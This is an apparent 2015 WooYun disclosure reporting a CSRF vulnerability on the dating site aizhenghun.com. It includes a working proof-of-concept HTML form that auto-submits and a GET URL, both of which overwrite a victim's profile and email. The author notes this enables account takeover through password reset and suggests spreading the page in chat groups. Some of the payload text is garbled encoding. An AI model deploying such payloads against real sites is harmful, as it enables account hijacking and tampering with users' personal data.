漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0127561
漏洞标题:爱征婚CSRF漏洞导致个人信息被篡改
相关厂商:aizhenghun.com
漏洞作者: 路人甲
提交时间:2015-07-20 15:49
修复时间:2015-07-25 15:50
公开时间:2015-07-25 15:50
漏洞类型:CSRF
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
爱征婚CSRF漏洞导致个人信息被篡改,可通过邮箱重置他人账号
小厂商好痛苦
详细说明:
POC
<html>
<body>
<form action="http://www.aizhenghun.com/register_Upd.asp" method="POST">
<input type="hidden" name="steps" value="1" />
<input type="hidden" name="nickname" value="123" />
<input type="hidden" name="email" value="service999@qq.com" />
<input type="hidden" name="marriage1" value="1" />
<input type="hidden" name="height" value="175" />
<input type="hidden" name="salary" value="9" />
<input type="hidden" name="year" value="1996" />
<input type="hidden" name="month" value="1" />
<input type="hidden" name="days" value="2" />
<input type="hidden" name="province" value="10102000" />
<input type="hidden" name="city" value="-1" />
<input type="hidden" name="education1" value="3" />
<input type="hidden" name="children1" value="-1" />
<input type="hidden" name="house" value="-1" />
<input type="hidden" name="age1" value="19" />
<input type="hidden" name="age2" value="25" />
<input type="hidden" name="workProvince" value="-1" />
<input type="hidden" name="workCity" value="-1" />
<input type="hidden" name="marriage2" value="-1" />
<input type="hidden" name="education2" value="-1" />
<input type="hidden" name="salary1" value="-1" />
<input type="hidden" name="children2" value="-1" />
<input type="hidden" name="height1" value="-1" />
<input type="hidden" name="height2" value="-1" />
<input type="hidden" name="hasphoto" value="1" />
<input type="hidden" name="nature2" value="-1" />
<input type="hidden" name="body2" value="-1" />
<input type="hidden" name="weight1" value="-1" />
<input type="hidden" name="weight2" value="-1" />
<input type="hidden" name="occupation2" value="-1" />
<input type="hidden" name="stock2" value="-1" />
<input type="hidden" name="wantchildren2" value="-1" />
<input type="hidden" name="hometownProvince2" value="-1" />
<input type="hidden" name="hometownCity2" value="-1" />
<input type="hidden" name="issmoking" value="-1" />
<input type="hidden" name="isdrinking" value="-1" />
<input type="hidden" name="introduce" value="�#162;´蟮娜�#180;笕�#182;¥¶¥°´�#177;´�#180;�#176;¡飒飒°¡°¡°¡实´蚴�#180;蟮�#182;� />
<input type="hidden" name="hobby" value="" />
<input type="hidden" name="pastime" value="" />
<input type="hidden" name="live" value="" />
<input type="hidden" name="nature" value="" />
<input type="hidden" name="issubmit" value="提½»" />
<input type="hidden" name="actio" value="1" />
<script>
document.forms[0].submit();
</script>
</form>
</body>
</html>
漏洞证明:
发现昵称 123 这些不可以修改
但是利用我们构造好的POC, 可以修改呢, 昵称:1 都可以呢
可以通过邮箱找回密码, 这里就不演示了
利用方法,加群发给用户。
又或者
http://www.aizhenghun.com/register_Upd.asp?steps=1&nickname=%B0%A1%CA%B5%B4%F2%CA%B5%B4%F3%B5%C4&email=service%40qq.com&marriage1=1&height=175&salary=9&year=1996&month=1&days=2&province=10102000&city=-1&education1=3&children1=-1&house=-1&age1=19&age2=25&workProvince=-1&workCity=-1&marriage2=-1&education2=-1&salary1=-1&children2=-1&height1=-1&height2=-1&hasphoto=1&nature2=-1&body2=-1&weight1=-1&weight2=-1&occupation2=-1&stock2=-1&wantchildren2=-1&hometownProvince2=-1&hometownCity2=-1&issmoking=-1&isdrinking=-1&introduce=%EF%BF%3F%23162%3B%26%23180%3B%E8%9F%AE%E5%26%2359330%3B%EF%BF%3F%23180%3B%E7%AC%95%EF%BF%BD%23182%3B%26%23165%3B%26%23182%3B%26%23165%3B%A1%E3%26%23180%3B%EF%BF%3F%23177%3B%26%23180%3B%EF%BF%3F%23180%3B%EF%BF%3F%23176%3B%26%23161%3B%E9%A3%92%E9%A3%92%A1%E3%26%23161%3B%A1%E3%26%23161%3B%A1%E3%26%23161%3B%E5%AE%3F%26%23180%3B%E8%9A%B4%EF%BF%BD%23180%3B%E8%9F%AE%EF%BF%BD%23182%3B%EF%BF%3F+%2F%3E%0D%0A++++++%3Cinput+type%3D&hobby=&pastime=&live=&nature=&issubmit=%CC%E1%BD%BB&actio=1
链接内容改改, 复制粘贴又是可以
我觉得唯一好玩的地方就是昵称了, 又空白昵称
修复方案:
厂商能大方点吗, Gift 有吗
挖洞不易,帮助厂商是我的责任
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-07-25 15:50
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无